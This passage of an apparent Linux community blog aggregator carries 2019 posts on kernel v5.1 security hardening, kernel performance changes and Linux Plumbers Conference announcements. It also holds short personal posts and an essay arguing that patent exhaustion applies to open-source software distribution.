An obvious problem with Pi-hole is what happens to laptops when they are outside of the home site protection. I suppose one could devise a clone of Pi-hole that plugs into the dnsmasq. Every Fedora system runs one, because NM needs it in order to support the correct lookup on VPNs {Update: see below}. The most valuable part of Pi-hole is the blocklist, the rest is just scripting.

[1] "Google’s Enterprise ad-blocking exception doesn’t seem to include G Suite’s low and mid-tier subscribers. G Suite Basic is $6 per user per month and G Suite Business is $12 per user month."

UPDATE: Ouch. A link by Roy Schestovitz made me remember how it actually worked, and I was wrong above: NM does not run dnsmasq by default. It only has a capability to do so, if you want DNS lookup on VPNs work correctly. So, every user of VPN enables "dns=dnsmasq" in NM. But it is not the default.

UPDATE: A reader mentions that he was rooted by ads served by Space.com. Only 1 degree of separation (beyond Windows in my family).

June 03, 2019 02:37 PM

May 28, 2019

Kees Cook: security things in Linux v5.1

Previously: v5.0.

Linux kernel v5.1 has been released! Here are some security-related things that stood out to me:

introduction of pidfd
Christian Brauner landed the first portion of his work to remove pid races from the kernel: using a file descriptor to reference a process (“pidfd”). Now /proc/$pid can be opened and used as an argument for sending signals with the new pidfd_send_signal() syscall. This handle will only refer to the original process at the time the open() happened, and not to any later “reused” pid if the process dies and a new process is assigned the same pid. Using this method, it’s now possible to racelessly send signals to exactly the intended process without having to worry about pid reuse. (BTW, this commit wins the 2019 award for Most Well Documented Commit Log Justification.)

explicitly test for userspace mappings of heap memory
During Linux Conf AU 2019 Kernel Hardening BoF, Matthew Wilcox noted that there wasn’t anything in the kernel actually sanity-checking when userspace mappings were being applied to kernel heap memory (which would allow attackers to bypass the copy_{to,from}_user() infrastructure). Driver bugs or attackers able to confuse mappings wouldn’t get caught, so he added checks. To quote the commit logs: “It’s never appropriate to map a page allocated by SLAB into userspace” and “Pages which use page_type must never be mapped to userspace as it would destroy their page type”. The latter check almost immediately caught a bad case, which was quickly fixed to avoid page type corruption.

LSM stacking: shared security blobs
Casey Shaufler has landed one of the major pieces of getting multiple Linux Security Modules (LSMs) running at the same time (called “stacking”). It is now possible for LSMs to share the security-specific storage “blobs” associated with various core structures (e.g. inodes, tasks, etc) that LSMs can use for saving their state (e.g. storing which profile a given task confined under). The kernel originally gave only the single active “major” LSM (e.g. SELinux, Apprmor, etc) full control over the entire blob of storage. With “shared” security blobs, the LSM infrastructure does the allocation and management of the memory, and LSMs use an offset for reading/writing their portion of it. This unblocks the way for “medium sized” LSMs (like SARA and Landlock) to get stacked with a “major” LSM as they need to store much more state than the “minor” LSMs (e.g. Yama, LoadPin) which could already stack because they didn’t need blob storage.

SafeSetID LSM
Micah Morton added the new SafeSetID LSM, which provides a way to narrow the power associated with the CAP_SETUID capability. Normally a process with CAP_SETUID can become any user on the system, including root, which makes it a meaningless capability to hand out to non-root users in order for them to “drop privileges” to some less powerful user. There are trees of processes under Chrome OS that need to operate under different user IDs and other methods of accomplishing these transitions safely weren’t sufficient. Instead, this provides a way to create a system-wide policy for user ID transitions via setuid() (and group transitions via setgid()) when a process has the CAP_SETUID capability, making it a much more useful capability to hand out to non-root processes that need to make uid or gid transitions.

ongoing: refcount_t conversions
Elena Reshetova continued landing more refcount_t conversions in core kernel code (e.g. scheduler, futex, perf), with an additional conversion in btrfs from Anand Jain. The existing conversions, mainly when combined with syzkaller, continue to show their utility at finding bugs all over the kernel.

ongoing: implicit fall-through removal
Gustavo A. R. Silva continued to make progress on marking more implicit fall-through cases. What’s so impressive to me about this work, like refcount_t, is how many bugs it has been finding (see all the “missing break” patches). It really shows how quickly the kernel benefits from adding -Wimplicit-fallthrough to keep this class of bug from ever returning.

stack variable initialization includes scalars
The structleak gcc plugin (originally ported from PaX) had its “by reference” coverage improved to initialize scalar types as well (making “structleak” a bit of a misnomer: it now stops leaks from more than structs). Barring compiler bugs, this means that all stack variables in the kernel can be initialized before use at function entry. For variables not passed to functions by reference, the -Wuninitialized compiler flag (enabled via -Wall) already makes sure the kernel isn’t building with local-only uninitialized stack variables. And now with CONFIG_GCC_PLUGIN_STRUCTLEAK_BYREF_ALL enabled, all variables passed by reference will be initialized as well. This should eliminate most, if not all, uninitialized stack flaws with very minimal performance cost (for most workloads it is lost in the noise), though it does not have the stack data lifetime reduction benefits of GCC_PLUGIN_STACKLEAK, which wipes the stack at syscall exit. Clang has recently gained similar automatic stack initialization support, and I’d love to this feature in native gcc. To evaluate the coverage of the various stack auto-initialization features, I also wrote regression tests in lib/test_stackinit.c.

That’s it for now; please let me know if I missed anything. The v5.2 kernel development cycle is off and running already. :)

© 2019, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

May 28, 2019 03:49 AM

May 27, 2019

Linux Plumbers Conference: Distribution Kernels Microconference Accepted into 2019 Linux Plumbers Conference

We are pleased to announce that the Distribution Kernels Microconference has been accepted to the 2019 Linux Plumbers Conference. This is the
first time Plumbers has offered a microconference focused on kernel distribution collaboration.

Linux distributions come in many forms, ranging from community run distributions like Debian and Gentoo, to commercially supported ones offered by SUSE or Red Hat, to focused embedded distributions like Android or Yocto. Each of these distributions maintains a kernel, making choices related to features and stability. The focus of this track is on the pain points distributions face in maintaining their chosen kernel and common solutions every distribution can benefit from.

Example topics include:

“Distribution kernel” is used in a very broad manner. If you maintain a kernel tree for use by others, we welcome you to come and share your experiences.

Here is a list of proposed topics. For Linux Plumbers 2019, new topics for microconferences can be submitted via the Call for Proposals (CfP) interface. Please visit the CfP page for more information.

May 27, 2019 05:24 PM

May 26, 2019

Linux Plumbers Conference: Linux Plumbers Earlybird Registration Quota Reached, Regular Registration Opens 30 June

A few days ago we added more capacity to the earlybird registration quota, but that too has now filled up, so your next opportunity to register for Plumbers will be Regular Registration on 30 June … or alternatively the call for presentations to the refereed track is still open and accepted talks will get a free pass.

Quotas were added a few years ago to avoid the entire conference selling out months ahead of time and accommodate attendees whose approval process takes a while or whose company simply won’t allow them to register until closer to the date of the conference.

May 26, 2019 04:54 PM

May 22, 2019

Linux Plumbers Conference: Additional early bird slots available for LPC 2019

The Linux Plumbers Conference (LPC) registration web site has been showing “sold out” recently because the cap on early bird registrations
was reached. We are happy to report that we have reviewed the registration numbers for this year’s conference and were able to open more early bird registration slots. Beyond that, regular registration will open July 1st. Please note that speakers and microconference runners get free passes to LPC, as do some microconference presenters, so that may be another way to attend the conference. Time is running out for new refereed-track and microconference proposals, so visit the CFP page soon. Topics for accepted microconferences are welcome as well.

LPC will be held in Lisbon, Portugal from Monday, September 9 through Wednesday, September 11.

We hope to see you there!

May 22, 2019 01:03 PM

May 20, 2019

James Morris: Linux Security Summit 2019 North America: CFP / OSS Early Bird Registration

The LSS North America 2019 CFP is currently open, and you have until May 31st to submit your proposal. (That’s the end of next week!)

If you’re planning on attending LSS NA in San Diego, note that the Early Bird registration for Open Source Summit (which we’re co-located with) ends today.

You can of course just register for LSS on its own, here.

May 20, 2019 08:56 PM

Linux Plumbers Conference: Tracing Microconference Accepted into 2019 Linux Plumbers Conference

We are pleased to announce that the Tracing Microconference has been accepted into the 2019 Linux Plumbers Conference! Its return to Linux Plumbers shows that tracing is not finished in Linux, and there continue to be challenging problems to solve.

There’s a broad list of ways to perform Tracing in Linux. From the original mainline Linux tracer, Ftrace, to profiling tools like perf, more complex customized tracing like BPF and out-of-tree tracers like LTTng, systemtap, and Dtrace. Part of the trouble with tracing within Linux is that there is so much to choose from. Each of these have their own audience, but there is a lot of overlap. This year’s theme is to find those common areas and combine them into common utilities.

There is also a lot of new work that is happening and discussions between top maintainers will help keep everyone in sync, and provide good direction for the future.

Expected topics include:

Come and join us and not only learn but help direct the future progress of tracing inside the Linux kernel and beyond!

Here is a list of proposed tracing topics. For Linux Plumbers 2019, new topics for microconferences can be submitted via the Call for Proposals (CfP) interface. Please visit the CfP page for more information.

We hope to see you there!

May 20, 2019 05:37 PM

Pete Zaitcev: Google Fi

Seen an amusing blog post today on the topic of the hideous debacle that is Google Fi (on top of being a virtual network). Here's the best part though:

About a year ago I tried to get my parents to switch from AT&T to Google Fi. I even made a spreadsheet for my dad (who likes those sorts of things) about how much money he could save. He wasn’t interested. His one point was that at anytime he can go in and get help from an AT&T rep. I kept asking “Who cares? Why would you ever need that?”. Now I know. He was paying almost $60 a month premium for the opportunity to able to talk to a real person, face-to-face! I would gladly pay that now.

Respect your elders!

May 20, 2019 03:39 PM

Ted Tso: Switching to Hugo

With the demise of Google+, I’ve decided to try to resurrect my blog. Previously, I was using Wordpress, but I’ve decided that it’s just too risky from a security perspective. So I’ve decided my blog over to Hugo.

A consequence of this switch is that all of the Wordpress comments have been dropped, at least for now.

May 20, 2019 03:19 AM

May 14, 2019

Dave Airlie (blogspot): Senior Job in Red Hat graphics team

We have a job in our team, it's a pretty senior role, definitely want people with lots of experience. Great place to work,ignore any possible future mergers :-)

https://global-redhat.icims.com/jobs/68911/principal-software-engineer/job?mobile=false&width=1526&height=500&bga=true&needsRedirect=false&jan1offset=600&jun1offset=600

May 14, 2019 09:07 PM

May 10, 2019

Linux Plumbers Conference: RISC-V microconference accepted for the 2019 Linux Plumbers Conference

The open nature of the RISC-V ecosystem has allowed contributions from both academia and industry leading to an unprecedented number of new hardware design proposals in a very short time span. Linux support is the key to enabling these new hardware options. Since last year’s Plumbers, many kernel features were added to RISC-V. To name a few, we now have out-of-box 32-bit and eBPF support, some key issues with Linux boot process have been addressed, and hypervisor support is on its way.

Last year’s RISC-V microconference was such a success that we would like to repeat that again this year by focusing on finding solutions and discussing ideas that require kernel changes.

Topics for this year microconference are expected to cover:

If you’re interested in participating in this microconference, please contact Atish Patra (atish.patra@wdc.com) or Palmer Dabbelt (palmer@dabbelt.com) . For Linux Plumbers 2019, new topics for microconferences can be submitted via the Call for Proposals (CfP) interface. Please visit the CfP page for more information.

LPC will be held in Lisbon, Portugal from Monday, September 9 through Wednesday, September 11.

We hope to see you there!

May 10, 2019 07:55 PM

May 09, 2019

Davidlohr Bueso: Linux v5.1: Performance Goodies

sched/wake_q: reduce atomic operations for special users

Some core users of wake_qs, futex and rwsems were incurring in double task reference counting - which was a side effect for safety reasons. This change levels the call's performance with the rest of the users.
[Commit 07879c6a3740]

irq: Speedup for interrupt statistics in /proc/stat

On large systems with a large amount of interrupts the readout of /proc/stat takes a long time to sum up the interrupt statistics.  The reason for this is that interrupt statistics are accounted per cpu. So the /proc/stat logic has to sum up the interrupt stats for each interrupt. While applications shouldn't really be doing this to a point where it creates bottlenecks, the fix was fairly easy.
[Commit 1136b0728969]

mm/swapoff: replace quadratic complexity for lineal

try_to_unuse() is of quadratic complexity, with a lot of wasted effort. It unuses swap entries one by one, potentially iterating over all the page tables for all the processes in the system for each one. With these changes, it now iterates over the system's mms once, unusing all the affected entries as it walks each set of page tables.

Improvements show time reductions for swapoff being called on a swap partition containing about 6G of data, from 8 to 3 minutes.
[Commit c5bf121e4350 b56a2d8af914]

  mm: make pinned_vm an atomic counter

This reduces some of the bulky mmap_sem games that are played when, mostly rdma, deals with the pinned pages counter. It also pivots on not relying on the lock for get user pages operations.
[Commit 70f8a3ca68d3 3a2a1e90564e b95df5e3e459]

drivers/async: NUMA aware async_schedule calls

Asynchronous function calls reduces, primarily, kernel boot time by safely doing out of order operations, such as device discovery. This series improves the NUMA locality by being able to schedule device specific init work on specific NUMA nodes in order to improve performance of memory initialization. Significant init reduction times for persistent memory were seen.
[Commit 3451a495ef24 ed88747c6c4a ef0ff68351be 8204e0c1113d 6be9238e5cb6 c37e20eaf4b2 8b9ec6b73277 af87b9a7863c 57ea974fb871]

lib/iov_iter: optimize page_copy_sane()

This avoid cacheline misses when dereferencing a struct page, via compound_head(), when possible. Apparently the overhead was visible on TCP doing recvmsg() calls dealing with GRO packets.
[Commit 6daef95b8c91]

fs/epoll: reduce lock contention in ep_poll_callback()

This patch increases the bandwidth of events which can be delivered from sources to the poller by adding poll items in a lockless way to the ready list; via clever ways of xchg() while holding a reader rwlock . This improves scenarios with multiple threads generating IO events which are delivered to a single threaded epoll_wait()er.
[Commit c141175d011f c3e320b61581 a218cc491420]

fs/nfs: reduce cost of listing huge directories (readdirplus)

When listing very large directories via NFS, clients may take a long time to complete. Most of the culprit is in various degrees of libc's readdir(2) reading 32k files at a time. To improve performance and reduce the amount of rpc calls, NFS readdirplus rpc will ask for a large data (more than 32k), the data can fill more than one page, the cached pages can be used for next readdir call. Benchmarks show rpc calls decreasing by 85% while listing a directory with 300k files.
[Commit be4c2d4723a4]

fs/pnfs: Avoid read/modify/write when it is not necessary

When testing with fio, Throughput of overwrite (both buffered and O_SYNC) is noticeably improved.
[Commit 97ae91bbf3a7 2cde04e90d5b]

May 09, 2019 08:10 PM

Davidlohr Bueso: Linux v5.0: Performance Goodies

mm/page-alloc: reduce zone->lock contention

Contention in the page allocator was seen in a network traffic report, in which order-0 allocations are being freed by back to the directly to the buddy, instead of making use of percpu-pages in the page_frag_free() call. Aside from eliminating the contention, it was seen to improve some microbenchmarks.
[Commit 65895b67ad27]

mm/mremap: improve scalability on large regions

When THP is disabled, move_page_tables() can bottleneck a large mremap() call, as it will copy each pte at a time. This patch speeds up the performance by copying at the PMD level when possible. Up to 20x speedups were seen when doing a 1Gb remap.
[Commit 2c91bd4a4e2e]

mm: improve anti-fragmentation

Given sufficient time or an adverse workload, memory gets fragmented and the long-term success of high-order allocations degrades. Overall the series reduces external fragmentation causing events by over 94% on 1 and 2 socket machines, which in turn impacts high-order allocation success rates over the long term.
[Commit 6bb154504f8b a921444382b4 0a79cdad5eb2 1c30844d2dfe]

mm/hotplug: optimize clear hw_poisoned_pages()

During hotplug remove, the kernel will loop for the respective number of pages looking for poisoned pages. Check the atomic hint in case this are none, and optimize the function.
[Commit 5eb570a8d924]

mm/ksm: Replace jhash2 with xxhash

xxhash is an extremely fast non-cryptographic hash algorithm for checksumming, making it suitable to use in kernel samepage merging. On a custom KSM benchmark, throughput was seen to improve from 1569 to 8770 MB/s.

genirq/affinity: Spread IRQs to all available NUMA nodes

If the number of NUMA nodes exceeds the number of MSI/MSI-X interrupts which are allocated for a device, the interrupt affinity spreading code fails to spread them across all nodes. NUMA nodes above the number of interrupts are all assigned to hardware queue 0 and therefore NUMA node 0, which results in bad performance and has CPU hotplug implications. Fix this by assigning via round-robin.
[Commit b82592199032]

fs/epoll: Optimizations for epoll_wait()

Various performance changes oriented towards improving the waiting side, such that contention epoll waitqueue (previously ep->lock) spinlock is reduced. This produces pretty good results for various concurrent epoll_wait(2) benchmarks.
[Commit 74bdc129850c 4e0982a00564 76699a67f304 21877e1a5b52 c5a282e9635e abc610e01c66 86c051793b4c]

lib/sbitmap: Various optimizations

Two optimizations to the sbitmap core were introduced, which is used, for example, by the block-mq tags. The first optimizes wakeup checks and adds to the core api, while the second introduces batched clearing of bits, trading 64 atomic bitops for 2 cmpxchg calls.
[Commit 5d2ee7122c73 ea86ea2cdced]

fs/locks: Avoid thundering herd wakeups

When one thread releases a lock on a given file, it wakes up all other threads that are waiting (classic thundering-herd) - one will get the lock and the others go to sleep.  The overhead starts being noticeable with increasing thread counts. These changes create a tree of pending lock request in which siblings don't conflict and each lock request does conflict with its parent. When a lock is released, only requests which don't conflict with each other a woken.

Testing shows that lock-acquisitions-per-second is now fairly stable even as number of contending process goes to 1000. Without this patch, locks-per-second drops off steeply after a few 10s of processes. Micro-benchmarks can be found per the lockscale program, which tests fcntl(..., F_OFD_SETLKW, ...) and flock(..., LOCK_EX) calls.

arm64/lib: improve crc32 performance for deep pipelines

This change replace most branches with a branchless code path that overlaps 16 byte loads to process the first (length % 32) bytes, and process the remainder using a loop that processes 32 bytes at a time.
[Commit efdb25efc764]

May 09, 2019 08:10 PM

Michael Kerrisk (manpages): man-pages-5.01 is released

I've released man-pages-5.01. The release tarball is available on kernel.org. The browsable online pages can be found on man7.org. The Git repository for man-pages is available on kernel.org.

This release resulted from patches, bug reports, reviews, and comments from just over 20 contributors. The release is smaller release than typical; it includes just over 70 commits that changed just over 40 pages.

The most notable of the changes in man-pages-5.01 is the following:


May 09, 2019 12:10 PM

May 04, 2019

Pete Zaitcev: YAML

Seen in a blog entry by Martin Tournoij (via):

I’ve been happily programming Python for over a decade, so I’m used to significant whitespace, but sometimes I’m still struggling with YAML. In Python the drawbacks and loss of clarity are contained by not having functions that are several pages long, but data or configuration files have no such natural limits to their length.

[...]

YAML may seem ‘simple’ and ‘obvious’ when glancing at a basic example, but turns out it’s not. The YAML spec is 23,449 words; for comparison, TOML is 3,339 words, JSON is 1,969 words, and XML is 20,603 words.

There's more where the above came from. In particular, the portability issues are rather surprising.

Unfortunately for me, OpenStack TripleO is based on YAML.

May 04, 2019 06:48 PM

Linux Plumbers Conference: BPF microconference accepted into 2019 Linux Plumbers Conference

We are pleased to announce that the BPF microconference has been accepted into the 2019 Linux Plumbers Conference! Last year’s BPF microconference was such a success that it will be held again this year.

BPF along with its just-in-time (JIT) compiler inside the Linux kernel allows for versatile programmability of the kernel and plays a major role in networking (XDP, tc BPF, etc.), tracing (kprobes, uprobes, tracepoints) and security (seccomp, landlock) subsystems.

Since last year’s Plumbers Conference, many of the discussed improvements have been tackled and found their way into the Linux kernel such as significant steps towards allowing for a compile-once paradigm with the help of BTF and global data support as well as considerable verifier scalability improvements to name a few. The topics proposed for this year’s event include:

– libbpf, loader unification
– Standardized BPF ELF format
– Multi-object semantics and linker-style logic for BPF loaders
– Verifier scalability work towards 1 million instructions
– Sleepable BPF programs
– BPF loop support
– Indirect calls in BPF
– Unprivileged BPF
– BPF type format (BTF)
– BPF timers
– bpftool
– LLVM BPF backend, JITs and BPF offloading
– and more

Come join us and participate in the decision making of one of the most cutting edge advancements in the Linux kernel!

See here for a detailed preview of the proposed and accepted topics. For Linux Plumbers 2019, new topics for microconferences can be submitted
via the Call for Proposals (CfP) interface. Please visit the CfP page for more information.

We hope to see you there!

May 04, 2019 01:31 AM

May 02, 2019

Pete Zaitcev: Fraud in the material world

Wow, they better not be building Boeings from this crap:

NASA Launch Services Program (LSP) investigators have determined the technical root cause for the Taurus XL launch failures of NASA’s Orbiting Carbon Observatory (OCO) and Glory missions in 2009 and 2011, respectively: faulty materials provided by aluminum manufacturer, Sapa Profiles (SPI). LSP’s technical investigation led to the involvement of NASA’s Office of the Inspector General and the U.S. Department of Justice (DOJ). DOJ’s efforts, recently made public, resulted in the resolution of criminal charges and alleged civil claims against SPI, and its agreement to pay $46 million to the U.S. government and other commercial customers. This relates to a 19-year scheme that included falsifying thousands of certifications for aluminum extrusions to hundreds of customers.

BTW, those costly failures probably hastened the sale of Orbital to ATK in 2015. There were repercussions for the personnell running the Taurus program as well.

May 02, 2019 05:52 PM

Daniel Vetter: Upstream First

lwn.net just featured an article the sustainability of open source, which seems to be a bit a topic in various places since a while. I’ve made a keynote at Siemens Linux Community Event 2018 last year which lends itself to a different take on all this:

The slides for those who don’t like videos.

This talk was mostly aimed at managers of engineering teams and projects with fairly little experience in shipping open source, and much less experience in shipping open source through upstream cross vendor projects like the kernel. It goes through all the usual failings and missteps and explains why an upstream first strategy is the right one, but with a twist: Instead of technical reasons, it’s all based on economical considerations of why open source is succeeding. Fundamentally it’s not about the better software, or the cheaper prize, or that the software freedoms are a good thing worth supporting.

Instead open source is eating the world because it enables a much more competitive software market. And all the best practices around open development are just to enable that highly competitive market. Instead of arguing that open source has open development and strongly favours public discussions because that results in better collaboration and better software we put on the economic lens, and private discussions become insider trading and collusions. And that’s just not considered cool in a competitive market. Similar arguments can be made with everything else going on in open source projects.

Circling back to the list of articles at the top I think it’s worth looking at the sustainability of open source as an economic issue of an extremely competitive market, in other words, as a market failure: Occasionally the result is that no one gets paid, the customers only receive a sub-par product with all costs externalized - costs like keeping up with security issues. And like with other market failures, a solution needs to be externally imposed through regulations, taxation and transfers to internalize all the costs again into the product’s prize. Frankly no idea how that would look like in practice though.

Anyway, just a thought, but good enough a reason to finally publish the recording and slides of my talk, which covers this just in passing in an offhand remark.

Update: Fix slides link.

May 02, 2019 12:00 AM

April 24, 2019

Linux Plumbers Conference: Lots of microconferences proposed for LPC

Microconference proposals have been rolling in for the 2019 Linux Plumbers Conference, but it is not too late to submit more. So far, we have the following microconference proposals:

If you have suggestions for topics to be discussed in those microconferences, please email contact@linuxplumbersconf.org to connect with the microconference runners.

Other microconference topic areas are still welcome, please go to the CFP page to submit yours today!

April 24, 2019 01:36 PM

April 13, 2019

Linux Plumbers Conference: Registration is open for the 2019 Linux Plumbers Conference

Registration is now open for the 2019 edition of the Linux Plumbers Conference (LPC). It will be held September 9-11 in Lisbon, Portugal with dedicated Linux Kernel Summit and Networking tracks, as was done last year, along with the microconferences and refereed presentations that are LPC standards. Go to the registration site to sign up or the attend page for more information on dates and quotas for the various registration types. Early registration will run until June 30 or until the quota is filled.

Note that the CFPs for microconferences, refereed track talks, and BoFs are still open, please see this page for more information.

As always, please contact the organizing committee if you have questions.

April 13, 2019 09:23 AM

April 12, 2019

Linux Plumbers Conference: Linux Plumbers Conference 2019 Call for Bird of a Feather (BoF) Session Proposals

On the heels of the previous announcements, we are also pleased to announce the Bird of a Feather (BoF) Session Proposals for the 2019 edition of the Linux Plumbers Conference, which will be held in Lisbon, Portugal on September 9-11 in conjunction with the Linux Kernel Maintainer Summit.

BoFs are free-form get-togethers for people wishing to discuss a particular topic. As always, you only need to submit proposals for BoFs you want to hold on-site. In contrast, and again as always, informal BoFs may be held at local drinking establishments or in the “hallway track” at your convenience.

For more information on submitting a BoF session proposal, see the following:

https://www.linuxplumbersconf.org/event/4/abstracts

Please note that the submission system is the same as 2018. If you created an user account last year, you will be able to re-use the same credentials to submit and modify your proposal(s) this year.

The call for Microconferences and Refereed-Track proposals are also open, and we hope to see you in Lisbon this coming September!

April 12, 2019 08:05 AM

April 10, 2019

Paul E. Mc Kenney: Confessions of a Recovering Proprietary Programmer, Part XVI

I build quite a few Linux kernels, mostly in support of my deep and abiding rcutorture habit. These builds can take some time, even on modern laptops, but they are nevertheless amazingly fast compared to the build times of the much smaller projects I worked on in decades past. Additionally, build times are way down in the noise when I am doing multi-hour rcutorture runs. So much so that I don't bother with cut-down kernel configurations, especially given that cut-down configurations are an excellent way to fail to spot subtle RCU API problems.

Still, faster builds do have their advantages, especially when doing a series of short tests, such as when chasing down that rarest of creatures, an RCU bug that reproduces reliably within a few minutes of boot. Which is exactly what I was doing yesterday. And during that time, a five-minute kernel build time was much more annoying than it normally would be.

But that is why we have ccache, a tool that is considerably more attractive than it was back when my laptop's mass storage weighed in at “only” a few tens of gigabytes. With a bit of help from here, here, and the ccache man page, I got ccache up and running, and somewhat later got it actually making kernel builds go faster. Sometimes considerably more than an order of magnitude faster!

But I do get spoiled really quickly.

You see, the first ccache build goes no faster than a normal build because the cache is initially empty. And yes, a five, six, or even seven-minute build was just fine a couple of days ago: After all, there is always some small task that needs to be done. But having just witnessed builds completing in way less than one minute, even a five-minute wait now seemed horribly slow. And a five-minute build is what I get the first time I run a given rcutorture scenario. Or after I modify an rcutorture scenario. Or if I specify unusual arguments to rcutorture's --kconfig command-line option. Or if I modify a heavily used include file. Or when I configured ccache's cache size too small.

Nevertheless, I most definitely should have installed ccache a very long time ago! :-)

April 10, 2019 09:37 PM

April 08, 2019

Linux Plumbers Conference: Results from the 2018 LPC survey

Thank you to everyone who participated in the survey after Linux Plumbers in 2018. We had 134 responses, which, given the total number of conference participants of around 492, has provided confidence in the feedback.

Overall: 85% of respondents were positive about the event, with only 2% actually saying they were dissatisfied. Co-locating with Kernel Summit proved popular, so we will be co-locating with Kernel Summit in 2019. Co-locating with Networking Summit was also well received, so we will be doing that again this year, too. Conference participation was up from 2017 and we sold out again this year. 98% of those that registered were able to attend.

Based on feedback from last year’s survey, we videotaped all of the sessions, and the videos are now posted. There are over 100 hours of video in our YouTube channel or you can access them by visiting the detailed schedule and clicking on the video link in the presentation materials section of any given talk or discussion. The Microconferences are recorded as one long video block, but clicking on the video link of a particular discussion topic will take you to the time index in that file where the chosen discussion begins.

Venue: 67% of survey respondents considered the size of attendees to be just right, however 25% would have like to have seen more able to attend. In general, 43% of respondents considered the venue size to be a good match, but a significant portion would have preferred it to be bigger (45%) as well. The room size was considered effective for participation by 95% of the respondents, however there was a clear indication in the comments that we need to figure out a better way to allocate rooms based on expected participants, as some ended up overflowing. There is some desire for additional electrical outlets to be made available, which will be looked into for the 2019 event.

Content: In terms of track feedback, Linux Plumbers Refereed track and Kernel Summit track were indicated as very relevant by almost all respondents who attended. The Networking track had fewer participants responding on the survey, but was positively reviewed as well. Hallway track continues to be regarded as very relevant, and appreciated.

Communication: This year we had a new website, and participants were able to navigate through it and find the session needed. In the feedback, there were some requests to integrate scheduling app capabilities (and attendee room size); the committee will look into options for that.

Events: Craft Beer was the most popular event and had favorable feedback from respondents. There were some concerns expressed in the written feedback that we didn’t clarify there were non-alcoholic options available there, and we’ll take note to communicate this better in future. The final closing event venue was originally planned for conference attendance similar to the prior year; the increase of 20% to 492 attendees, impacted this event, and the perception was that it was too crowded and had insufficient food from the comments.

There were lots of great suggestions to the “what one thing would you like to see changed” question, and the program committee has been studying them to see what is possible to implement this year. Thank you again to the participants for their input and help on making the Linux Plumbers Conference better in 2019 and the future.

April 08, 2019 03:30 PM

March 30, 2019

James Bottomley: A Roadmap for Eliminating Patents in Open Source

The realm of Software Patents is often considered to be a fairly new field which isn’t really influenced by anything else that goes on in the legal lansdcape. In particular there’s a very old field of patent law called exhaustion which had, up until a few years ago, never been applied to software patents. This lack of application means that exhaustion is rarely raised as a defence against infringement and thus it is regarded as an untested strategy. Van Lindberg recently did a FOSDEM presentation containing interesting ideas about how exhaustion might apply to software patents in the light of recent court decisions. The intriguing possibility this offers us is that we may be close to an enforceable court decision (at least in the US) that would render all patents in open source owned by community members exhausted and thus unenforceable. The purpose of this blog post is to explain the current landscape and how we might be able to get the necessary missing court decisions to make this hope a reality.

What is Patent Exhaustion?

Patent law is ancient, going back to Greece in around 500BC. However, every legal system has been concerned that patent holders, being an effective monopoly with the legal right to exclude others, did not abuse that monopoly position. This lead to the concept that if you used your monopoly power to profit, you should only be able to do it once for the same item so that absolute property rights couldn’t be clouded by patents. This leads to something called the exhaustion doctrine: so if Alice holds a patent on some item which she sells to Bob and Bob later sells the same item to Charlie, Alice can’t force Bob or Charlie to give her a part of their sale proceeds in exchange for her allowing Charlie to practise the patent on the item. The patent rights are said to be exhausted with the sale from Alice to Bob, so there are no patent rights left to enforce on Charlie. The exhaustion doctrine has since been expanded to any authorized transfer, even if no money changes hands (so if Alice simply gave Bob the item instead of selling it, the patent still exhausts at that transaction and Bob is still free to give or sell the item to Charlie without interference from Alice).

Of course, modern US patent rights have been around now for two centuries and in that time manufacturers have tried many ingenious schemes to get around the exhaustion doctrine profitably, all of which have so far failed in the courts, leading to quite a wealth of case law on the subject. The most interesting recent example (Lexmark v Impression) was over whether a patent holder could use their patent power to enforce any onward conditions at all for which the US Supreme Court came to the conclusive finding: they can’t and goes on to say that all patent rights in the item terminate in the first authorized transfer. That doesn’t mean no post sale conditions can be imposed, they can by contract or licence or other means, it just means post sale conditions can’t be enforced by patent actions. This is the bind for Lexmark: their sales contracts did specify that empty cartridges couldn’t be resold, so their customers violated that contract by selling the cartridges to Impression to refill and resell. However, that contract was between Lexmark and the customer not Lexmark and Impression, so absent patent remedies Lexmark has no contractual case against Impression, only against its own customers.

Can Exhaustion apply if Software isn’t actually sold?

The exhaustion doctrine actually has an almost identical equivalent for copyright called the First Sale doctrine. Back when software was being commercialized, no software distributor liked the idea that copyright in software exhausts after it is sold, so the idea of licensing instead of selling software was born, which is why you always get that end user licence agreement for software you think you bought. However, this makes all software (including open source) a very tricky for patent exhaustion because there’s no first sale to exhaust the rights.

The idea that Exhaustion didn’t have to involve an exchange of something (so became authorized transfer instead of first sale) in US law is comparatively recent, dating to a 2013 decision LifeScan v Shasta where one point won on appeal was that giving away devices did exhaust the patent. The idea that authorized transfer could extend to software downloads really dates to Cascades v Samsung in 2014.

The bottom line is that exhaustion does apply to software and downloading is an authorized transfer within the meaning of the Exhaustion Doctrine.

The Implications of Lexmark v Impression for Open Source

The precedent for Open Source is quite clear: Patents cannot be used to impose onward conditions that the copyright licence doesn’t. For instance the Open Air Interface 5G alliance public licence attempts just such a restriction in clause 3 “Grant of Patent License” where it tries to restrict the grant to being only if you use the source for “study and research” otherwise you need an additional patent licence from OAI. Lexmark v Impressions makes that clause invalid in the licence: once you obtain open source under the OAI licence, the OAI patents exhaust at that point and there are no onward patent rights left to enforce. This means that source distributed under OAI can be reused under the terms of the copyright licence (which is permissive) without any fear of patent restrictions. Now OAI can still amend its copyright licence to impose the field of use restrictions and enforce them via copyright means, it just can’t use patents to do so.

FRAND and Open Source

There have recently been several attempts to claim that FRAND patent enforcement and Open Source licensing can be compatible, or more specifically a FRAND patent pool holder like a Standards Development Organization can both produce an Open Source reference implementation and still collect patent Royalties. This looks to be wrong, however; the Supreme Court decision is clear: once a FRAND Patent pool holder distributes any code, that distribution is an authorized transfer within the meaning of the first sale doctrine and all FRAND pool patents exhaust at that point. The only way to enforce the FRAND royalty payments after this would be in the copyright licence of the code and obviously such a copyright licence, while legal, would not be remotely an Open Source licence.

Exhausting Patents By Distribution

